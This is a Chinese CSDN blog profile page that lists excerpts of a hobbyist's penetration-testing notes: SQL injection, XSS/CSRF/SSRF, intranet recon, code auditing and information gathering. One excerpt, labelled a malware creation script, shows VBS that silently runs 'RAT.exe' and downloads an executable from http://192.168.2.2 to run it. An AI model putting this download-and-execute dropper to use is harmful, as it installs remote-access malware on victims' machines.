香煎的小鹿
码龄6年
关注
提问 私信
  • 博客:4,689
    4,689
    总访问量
  • 10
    原创
  • 2,129,152
    排名
  • 3
    粉丝
  • 0
    铁粉
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:甘肃省
  • 加入CSDN时间: 2019-07-15
博客简介:

xingxingdoukeyi的博客

查看详细资料
个人成就
  • 获得3次点赞
  • 内容获得0次评论
  • 获得9次收藏
创作历程
  • 1篇
    2021年
  • 9篇
    2020年
成就勋章
兴趣领域 设置
  • 网络空间安全
    系统安全
创作活动更多

超级创作者激励计划

万元现金补贴,高额收益分成,专属VIP内容创作者流量扶持,等你加入!

去参加
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

加密算法识别记录

1.密文比较原文:test1234567890base64:dGVzdDEyMzQ1Njc4OTA=AES:DvXZl/otGWo/PBV4BvjF1A== (ECB,123456)md5:1AE954CFB7B05EB7F885524D6EF4A2C4sha1:32ab108f70a062457f0763adc66e0c0fe17a150asha256:7afecb08fb6b7bab4bb45c755d857ae71d90ed2b37899f29b8bbc6ae758a517
原创
发布博客 2021.01.14 ·
473 阅读 ·
2 点赞 ·
0 评论 ·
0 收藏

java笔记

最近在跟着学ssm框架,对自己的平台项目边开发边审计一下Spring+SpringMVC+MyBatis持久层:DAO层(mapper)mybatis在入参的地方提供了两种方式,“#{}”和“${}”,其中#{}传入的参数经过了预编译,无法进行sql注入业务层:Service层通常写逻辑就在这一层,可以审计越权和业务逻辑漏洞,常出现的功能点,删除:只传的id未判断是否是当前用户。需要通读业务流程。表现层:Controller层(Handler层)连接前端页面,通过注解对应后端相应功能实体层(
原创
发布博客 2020.11.01 ·
123 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

xss,csrf,ssrf简单记录

一. xss跨站脚本攻击,是出现最普通的漏洞,不过chrome自带过滤一半,waf也可以过滤一些。XSS利用的是用户对指定网站的信任常用的XSS攻击手段和目的有:1、盗用cookie,获取敏感信息。2、利用植入Flash,通过crossdomain权限设置进一步获取更高权限;或者利用Java等得到类似的操作。3、利用iframe、frame、XMLHttpRequest或上述Flash等方式,以(被攻击)用户的身份执行一些管理动作,或
原创
发布博客 2020.10.31 ·
321 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

内网渗透自己的笔记

拿到shell进入内网后虽然ms17010横行但也是不能拿着扫描器到处扫的,每一步都应该小心谨慎首先在下认为应该判断是否为虚拟机,docker,蜜獾等docker通常会有一些命令not find例如ifconfig uname-a 等如果打着四面漏风的系统多半就是蜜獾了,而且里面没有正经的办公痕迹的也很可疑vm虚拟机为运行xchg ecx,eax 时间大于0xFF时可以确定//使用如下命令判断dockerls -alh ./dockerenvcat /proc/1/cgroup//没有i
原创
发布博客 2020.10.22 ·
290 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

owasp top10之失效的身份认证和会话管理 笔记

身份认证最常用的地方就是各种登录,现在很多应用使用了手机验证码认证的方式,以及联动QQ,微信,邮箱等登录方式,个人感觉比输入账号密码时SQL注入变少了很多,不过花里胡哨的逻辑漏洞变多了会话管理因为http本身是无状态协议,所以需要一些验证机制,会话管理一般为登录状态成功后,由服务器为客户端分配的令牌,要求是唯一并且不可预测,通常为客户端cookie,服务器端session,token两边都有...
原创
发布博客 2020.10.21 ·
734 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

owasp top10之SQL注入 一些笔记

自用,记录一下一.原理百度上解释为:SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。我认为一句话来说就是:程序未将用户输入的数据与代码区分开来,造成未授权任意查询操作数据库二.利用如果大站遇到任何SQL洞都是人品爆棚了,或者又是蜜獾,常规利用方式就不记录了一.常用技巧①.二次注入
原创
发布博客 2020.10.19 ·
375 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

一个简单的双线程守护

简单双线程守护1.定义一个全局句柄m_ hProcess, 用于存储另进程的句柄。2.程序启动后,先枚举所有的进程列表,查看是否有另进程,如果有的话,通过OpenProcess得到其进程句柄,存储在1中的变量中。3.此时判断该句柄是否为NULL,不为NULL就用WaitForingIeobjct等待直到这个进程被终止, 并且再把m_ hProcess置NULL。4.接着3,创建另进程, 因为不论原来的另一进程被杀掉还是本来进程列表就没有此进程,都要创建该进程。5.创建另-进程句柄,然后等待其
原创
发布博客 2020.07.27 ·
189 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

渗透测试中的一些信息收集方式

自用,记录一下seo查询 https://www.aizhan.com多地ping 查有无cdn http://ping.chinaz.com/ip地址与域名查询 https://site.ip138.com/查询服务器旁站以及子域名站点,主站一般比较难 http://s.tool.chinaz.com/same云悉网站指纹信息 http://www.yunsee.cn/google语法搜索 intitle: inurl: intxt
原创
发布博客 2020.11.01 ·
973 阅读 ·
1 点赞 ·
0 评论 ·
3 收藏

vbs脚本

恶意软件创建脚本##后台运行set w=createobject(“wscript.shell”)w.run “RAT.exe”,0##下载后判断执行Set xPost = createObject(“Microsoft.XMLHTTP”)xPost.Open “GET”,“http://192.168.2.2/1.exe”,0xPost.Send()Set sGet = crea...
原创
发布博客 2020.05.05 ·
272 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

关于偶尔java环境变量重启后丢失

一句话,配置好JAVA_HOME path classpath后检查path中多余错误的java环境变量,例如D:/java/jdk/jre D:java/JDK/JDK 等删除
原创
发布博客 2020.05.05 ·
851 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

2019御剑后台扫描带字典.zip

发布资源 2019.12.01 ·
zip